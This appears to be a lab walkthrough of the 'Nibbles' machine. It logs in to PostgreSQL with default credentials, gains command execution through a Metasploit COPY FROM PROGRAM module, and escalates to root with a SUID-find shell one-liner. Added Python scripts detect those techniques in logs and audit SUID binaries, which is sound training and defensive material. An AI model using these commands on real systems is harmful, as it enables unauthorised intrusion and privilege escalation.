
# Nibbles

## Nmap

```
sudo nmap 192.168.51.47 -p- -sS -sV

PORT     STATE  SERVICE      VERSION
21/tcp   open   ftp          vsftpd 3.0.3
22/tcp   open   ssh          OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open   http         Apache httpd 2.4.38 ((Debian))
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
5437/tcp open   postgresql   PostgreSQL DB 11.3 - 11.7
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 5437 is running PostgreSQL, which nmap fingerprints as version 11.3 - 11.7. I was able to log in with the default credentials `postgres:postgres` using `psql`.

```
psql -h 192.168.51.47 -U postgres -p 5437
```

![](/files/-MUxzijPPEUZJanoxOzx)

Because the target runs a PostgreSQL version newer than 9.3, the following exploit should give us command execution on the target machine.

{% embed url="https://www.exploit-db.com/exploits/46813" %}

**Description**

*Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with 'pg\_execute\_server\_program' to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access.*

*This module attempts to create a new table, then execute system commands in the context of copying the command output into the table.*

*This module should work on all Postgres systems running version 9.3 and above.*

*For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse\_perl*

*For Windows Systems, target 2 is used with PowerShell payloads such as: cmd/windows/powershell\_reverse\_tcp. Alternatively target 3 can be used to execute generic commands, such as a web\_delivery meterpreter powershell payload or other customized command.*

First, confirm that our PostgreSQL user is a superuser (the module needs either that or membership of `pg_execute_server_program`):

```
SELECT current_setting('is_superuser');
```

![](/files/-MUy0LmyaYeoBrS2pAHc)

With superuser confirmed, we can use the following `Metasploit` module to gain a shell.

```
use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
```

![](/files/-MUy0tcjMP2sV2kcz3bF)

Execution:

![](/files/-MUy19SyCwuT7aPONqQ-)
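From the defensive side, the module's behaviour described above (create a table, `COPY ... FROM PROGRAM`, read the output, drop the table) is easy to spot in the PostgreSQL server log. The following is an added example, not code from this writeup or from the Metasploit module: it runs simple detection logic over a handful of constructed log lines and groups the statements of the offending backend so a responder sees the whole sequence. It assumes `log_statement = 'all'` (COPY is not DDL, so `'ddl'` would not record it) and a `log_line_prefix` of `'%m [%p] %u@%d %r '`; adjust `STATEMENT_RE` for a different prefix.

```python
import re
from dataclasses import dataclass

# Constructed sample of a PostgreSQL server log (not a capture from the target).
# Assumed settings: log_statement = 'all' and log_line_prefix = '%m [%p] %u@%d %r ',
# so every statement line carries timestamp, backend pid, user@db and client address.
SAMPLE_LOG = """\
2021-02-13 10:14:58.001 UTC [2381] postgres@postgres 192.168.51.200(41230) LOG:  connection authorized: user=postgres database=postgres
2021-02-13 10:15:02.123 UTC [2381] postgres@postgres 192.168.51.200(41230) LOG:  statement: CREATE TABLE tmp_out(c text);
2021-02-13 10:15:02.130 UTC [2381] postgres@postgres 192.168.51.200(41230) LOG:  statement: COPY tmp_out FROM PROGRAM 'id';
2021-02-13 10:15:02.140 UTC [2381] postgres@postgres 192.168.51.200(41230) LOG:  statement: SELECT * FROM tmp_out;
2021-02-13 10:15:02.150 UTC [2381] postgres@postgres 192.168.51.200(41230) LOG:  statement: DROP TABLE tmp_out;
2021-02-13 10:20:00.000 UTC [2390] app@inventory 10.0.0.5(50122) LOG:  statement: COPY items TO STDOUT;
2021-02-13 10:21:00.000 UTC [2391] app@inventory 10.0.0.5(50123) LOG:  statement: copy staging from program '/usr/bin/env';
"""

# One logged statement, parsed from the assumed log_line_prefix layout.
STATEMENT_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) (?P<client>\S+) "
    r"LOG:  statement: (?P<sql>.*)$"
)
# COPY ... FROM PROGRAM reads a command's output; COPY ... TO PROGRAM pipes table data into a command.
# Both run as the postgres OS user, so both are worth an alert. Case-insensitive: SQL keywords are.
PROGRAM_RE = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\b", re.IGNORECASE | re.DOTALL)


@dataclass
class Finding:
    ts: str
    pid: str
    user: str
    db: str
    client: str
    direction: str  # "FROM" or "TO"
    sql: str


def find_program_copies(log_text: str) -> list[Finding]:
    """Return every logged statement that uses COPY ... FROM/TO PROGRAM."""
    findings = []
    for line in log_text.splitlines():
        m = STATEMENT_RE.match(line)
        if not m:
            continue  # connection/auth lines and other non-statement entries
        hit = PROGRAM_RE.search(m["sql"])
        if hit:
            findings.append(Finding(m["ts"], m["pid"], m["user"], m["db"], m["client"],
                                    hit.group(1).upper(), m["sql"]))
    return findings


def session_statements(log_text: str, pid: str) -> list[str]:
    """All statements logged by one backend process, in order, so the
    create-table / COPY FROM PROGRAM / SELECT / DROP TABLE sequence is visible as a unit."""
    return [m["sql"] for line in log_text.splitlines()
            if (m := STATEMENT_RE.match(line)) and m["pid"] == pid]


if __name__ == "__main__":
    for f in find_program_copies(SAMPLE_LOG):
        print(f"{f.ts} pid={f.pid} {f.user}@{f.db} from {f.client}: COPY {f.direction} PROGRAM")
        for stmt in session_statements(SAMPLE_LOG, f.pid):
            print("    ", stmt)
```

Two of the constructed lines are flagged (the superuser session on pid 2381 and the lowercase `copy ... from program` on pid 2391); the plain `COPY items TO STDOUT` is not. Beyond logging, the page's own precondition is the lever for prevention: only superusers and members of `pg_execute_server_program` can issue these statements, so application roles should have neither, and the `postgres` superuser should not be reachable over the network with a default password.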

Checking SUID binaries and `PATH`, we find a `.` at the end of `PATH` and the SUID bit set on the `find` binary.

![](/files/-MUy23kgyWT-3jYa7heH)

Knowing this, we can attempt to escalate privileges through the SUID `find` binary. Checking [GTFOBins](https://gtfobins.github.io/gtfobins/find/#suid) confirms this is possible:

![https://gtfobins.github.io/gtfobins/find/](/files/-MUy2Hd35ZHoWqU8TIJ9)

Running the following will escalate privileges:

```
find . -exec /bin/sh -p \; -quit
```

![](/files/-MUy2kogrjtptRX5OHM7)
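The two findings that made this escalation possible (a `.` entry in `PATH` and an SUID bit on a binary GTFOBins lists as shell-capable) are both things a host audit can catch before an attacker does. The script below is an added example, not part of this writeup: it flags unsafe `PATH` entries, walks directories for setuid files, and separates the ones whose name appears in a constructed shortlist of GTFOBins SUID entries. The shortlist is an assumption kept deliberately small; a real audit would carry the full GTFOBins list. `demo_in_tempdir` builds a throwaway directory with a fake setuid `find` so the check is reproducible without touching the real system.

```python
import os
import stat
import tempfile

# Constructed shortlist (assumption, not the full list) of binaries GTFOBins documents
# as giving a shell or arbitrary file access when they carry the SUID bit.
SHELL_CAPABLE_SUID = {"find", "bash", "sh", "vim", "nmap", "python3", "perl", "env", "less", "more", "awk"}


def risky_path_entries(path_value: str) -> list[str]:
    """Return PATH entries that let a binary in the current (or a relative) directory
    shadow a system command: '.', an empty entry ('a::b' or a trailing ':'), or any relative path."""
    risky = []
    for entry in path_value.split(":"):
        if entry == "" or entry == "." or not entry.startswith("/"):
            risky.append(entry if entry else "<empty>")
    return risky


def suid_binaries(search_dirs) -> list[str]:
    """Walk the given directories and return regular files with the setuid bit set
    (symlinks are skipped: the bit only matters on the target file)."""
    hits = []
    for d in search_dirs:
        for root, _dirs, files in os.walk(d):
            for name in files:
                p = os.path.join(root, name)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue  # unreadable or vanished; not our call to make here
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    hits.append(p)
    return sorted(hits)


def classify_suid(paths) -> tuple[list[str], list[str]]:
    """Split setuid files into GTFOBins-known shell-capable ones and the rest.
    Remediation for the first group is usually `chmod u-s <path>` unless a documented need exists."""
    flagged = [p for p in paths if os.path.basename(p) in SHELL_CAPABLE_SUID]
    other = [p for p in paths if p not in flagged]
    return flagged, other


def demo_in_tempdir() -> dict:
    """Reproducible offline run: a scratch directory holding a setuid 'find' (0o4755)
    next to a plain 0o755 'ls', audited together with a PATH that ends in '.'."""
    d = tempfile.mkdtemp()
    for name, mode in (("find", 0o4755), ("ls", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")  # placeholder script, never executed
        os.chmod(p, mode)
    flagged, other = classify_suid(suid_binaries([d]))
    return {
        "flagged": [os.path.basename(p) for p in flagged],
        "other": [os.path.basename(p) for p in other],
        "risky_path": risky_path_entries("/usr/local/bin:/usr/bin:/bin:."),
    }


if __name__ == "__main__":
    print(demo_in_tempdir())
    # Real-host audit: current PATH plus the usual binary directories.
    print("PATH issues:", risky_path_entries(os.environ.get("PATH", "")))
    flagged, other = classify_suid(suid_binaries(["/usr/bin", "/bin", "/usr/sbin", "/sbin"]))
    print("shell-capable SUID:", flagged)
    print("other SUID:", other)
```

On the target in this writeup the flagged list would contain `/usr/bin/find` and the `PATH` check would return `['.']`; the fix is `chmod u-s /usr/bin/find` and removing `.` from `PATH` in the shell profile. A file-integrity or configuration-management check that re-runs `suid_binaries` against a known-good baseline turns this one-off audit into ongoing detection.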

